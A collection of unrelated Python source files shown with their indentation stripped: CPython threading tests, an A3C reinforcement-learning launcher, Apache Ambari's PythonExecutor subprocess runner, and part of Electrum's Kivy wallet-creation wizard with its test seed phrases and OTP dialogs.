@unittest.skipUnless(sys.platform == 'darwin' and test.support.python_is_optimized(),
'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
main.py
|
from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import my_optim
from envs import create_atari_env
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--tau', type=float, default=1.00,
help='parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='max norm for gradient clipping (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)')
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = create_atari_env(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[0], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
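# Example invocation (illustrative; the flag values shown are the defaults
# defined by the parser above):
#   python main.py --env-name PongDeterministic-v4 --num-processes 4 --lr 0.0001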
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
from threading import Thread
from Grep import Grep
import shell, sys
logger = logging.getLogger()
class PythonExecutor:
"""
Executes Python scripts in separate subprocesses.
Warning: this class maintains internal state. As a result, an instance should
not be shared (i.e. used as a singleton) across concurrent script executions.
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def run_file(self, script, script_params, tmpoutfile, tmperrfile, timeout,
tmpstructedoutfile, logger_level, override_output_files = True):
"""
Executes the specified Python file in a separate subprocess.
The method returns only when the subprocess has finished.
`script_params` is a list of parameters passed to the script.
`timeout` is the number of seconds after which script execution is
forcibly terminated.
`override_output_files` defines whether the stdout/stderr files are
recreated or appended to.
"""
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
# need to remove this file for the following case:
# status call 1 does not write to file; call 2 writes to file;
# call 3 does not write to file, so contents are still call 2's result
try:
os.unlink(tmpstructedoutfile)
except OSError:
pass # no error
script_params += [tmpstructedoutfile, logger_level]
pythonCommand = self.python_command(script, script_params)
logger.info("Running command " + pprint.pformat(pythonCommand))
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = process.returncode
out = open(tmpoutfile, 'r').read()
error = open(tmperrfile, 'r').read()
try:
with open(tmpstructedoutfile, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(tmpstructedoutfile):
errMsg = 'Unable to read structured output from ' + tmpstructedoutfile
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout"
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.info("Result: %s" % result)
return result
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
Creates a subprocess with the given parameters. This functionality lives in a
separate method to make unit testing possible.
"""
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=True)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
python_binary = sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
"exitcode": retcode,
"stdout": grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
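# Illustrative usage sketch (the paths, timeout and config object are
# assumptions, not part of the original module):
#
#   executor = PythonExecutor('/tmp', config)
#   result = executor.run_file('/path/to/script.py', ['START'],
#                              '/tmp/out.txt', '/tmp/err.txt', 600,
#                              '/tmp/structured-out.json', 'INFO')
#   print(result['exitcode'], result['structuredOut'])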
|
installwizard.py
|
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.utils import platform
from kivy.uix.widget import Widget
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum.gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://electrum/gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'electrum/gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
Widget
size_hint: 1, 1
height: '48sp'
BoxLayout:
orientation: 'horizontal'
WizardButton:
id: cb
text: _('Request new secret')
on_release: root.request_new_secret()
size_hint: 1, None
WizardButton:
id: abort
text: _('Abort creation')
on_release: root.abort_wallet_creation()
size_hint: 1, None
<WizardNewOTPDialog>
message : ''
message2 : ''
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
QRCodeWidget:
id: qr
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message2
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://electrum/gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<SeedDialogHeader@GridLayout>
text: ''
options_dialog: None
rows: 1
orientation: 'horizontal'
size_hint: 1, None
height: self.minimum_height
BigLabel:
size_hint: 9, None
text: root.text
IconButton:
id: options_button
height: '30dp'
width: '30dp'
size_hint: 1, None
icon: 'atlas://electrum/gui/kivy/theming/light/gear'
on_release:
root.options_dialog() if root.options_dialog else None
<RestoreSeedDialog>
message: ''
word: ''
SeedDialogHeader:
id: seed_dialog_header
text: 'ENTER YOUR SEED PHRASE'
options_dialog: root.options_dialog
GridLayout:
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://electrum/gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
SeedDialogHeader:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
options_dialog: root.options_dialog
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '48dp'
SeedLabel:
text: root.warning
<ChoiceLineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
SeedLabel:
text: root.message2
TextInput:
id: text_input
multiline: False
size_hint: 1, None
height: '48dp'
''')
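# The kv rules loaded above define the layouts used by the wizard dialog classes below.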
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
self.auto_dismiss = False
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
self._trigger_size_dialog = Clock.create_trigger(self._size_dialog)
# note: everything bound here needs to be unbound as otherwise the
# objects will be kept around and keep receiving the callbacks
Window.bind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
self._trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
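# size the dialog for the current device: full window on phones, a fraction of the window on tablets (depending on orientation)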
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_keyboard(self, instance, key, keycode, codepoint, modifier):
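# key 27 is Escape / the Android back button: go back one wizard step, or require a second press to exit the app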
if key == 27:
if self.wizard.can_go_back():
self.wizard.go_back()
else:
app = App.get_running_app()
if not app.is_exit:
app.is_exit = True
app.show_info(_('Press again to exit'))
else:
self._on_release = False
self.dismiss()
return True
def on_dismiss(self):
Window.unbind(size=self._trigger_size_dialog,
rotation=self._trigger_size_dialog,
on_keyboard=self.on_keyboard)
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardOTPDialogBase(WizardDialog):
def get_otp(self):
otp = self.ids.otp.text
if len(otp) != 6:
return
try:
return int(otp)
except ValueError:
return
def on_text(self, dt):
self.ids.next.disabled = self.get_otp() is None
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardKnownOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
self.message = _("This wallet is already registered with TrustedCoin. To finalize wallet creation, please enter your Google Authenticator Code.")
self.message2 = _("If you have lost your Google Authenticator account, you can request a new secret. You will need to retype your seed.")
self.request_new = False
def get_params(self, button):
return (self.get_otp(), self.request_new)
def request_new_secret(self):
self.request_new = True
self.on_release(True)
def abort_wallet_creation(self):
self._on_release = True
self.wizard.terminate(aborted=True)
self.dismiss()
class WizardNewOTPDialog(WizardOTPDialogBase):
def __init__(self, wizard, **kwargs):
WizardOTPDialogBase.__init__(self, wizard, **kwargs)
otp_secret = kwargs['otp_secret']
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
self.message = "Please scan the following QR code in Google Authenticator. You may also use the secret key: %s"%otp_secret
self.message2 = _('Then, enter your Google Authenticator code:')
self.ids.qr.set_data(uri)
def get_params(self, button):
return (self.get_otp(), False)
class WizardTOSDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.text = 'Accept'
self.ids.next.disabled = False
self.message = kwargs['tos']
self.message2 = _('Enter your email address:')
class WizardEmailDialog(WizardDialog):
def get_params(self, button):
return (self.ids.email.text,)
def on_text(self, dt):
self.ids.next.disabled = not is_valid_email(self.ids.email.text)
def on_enter(self, dt):
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
class WizardConfirmDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardConfirmDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
self.value = 'ok'
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (True,)
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.title = kwargs.get('message', '')
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
self.init_choices(choices)
def init_choices(self, choices):
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message = kwargs.get('message', '')
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class CLButton(ToggleButton):
def on_release(self):
self.root.script_type = self.script_type
self.root.set_text(self.value)
class ChoiceLineDialog(WizardChoiceDialog):
title = StringProperty('')
message1 = StringProperty('')
message2 = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.title = kwargs.get('title', '')
self.message1 = kwargs.get('message1', '')
self.message2 = kwargs.get('message2', '')
self.choices = kwargs.get('choices', [])
default_choice_idx = kwargs.get('default_choice_idx', 0)
self.ids.next.disabled = False
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for idx, (script_type, title, text) in enumerate(self.choices):
b = CLButton(text=title, height='30dp', group=self.title, allow_no_selection=False)
b.script_type = script_type
b.root = self
b.value = text
layout.add_widget(b)
if idx == default_choice_idx:
b.trigger_action(duration=0)
def set_text(self, value):
self.ids.text_input.text = value
def get_params(self, b):
return (self.ids.text_input.text, self.script_type)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, _):
self.ext = ext
d = SeedOptionsDialog(self.ext, None, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
self.bip39 = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(ext, bip39):
self.ext = ext
self.bip39 = bip39
self.update_next_button()
d = SeedOptionsDialog(self.ext, self.bip39, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def update_next_button(self):
self.ids.next.disabled = False if self.bip39 else not bool(self._test(self.get_text()))
def on_text(self, dt):
self.update_next_button()
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
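# rebuild the suggestion buttons and enable only the keyboard letters that can still extend the current word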
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
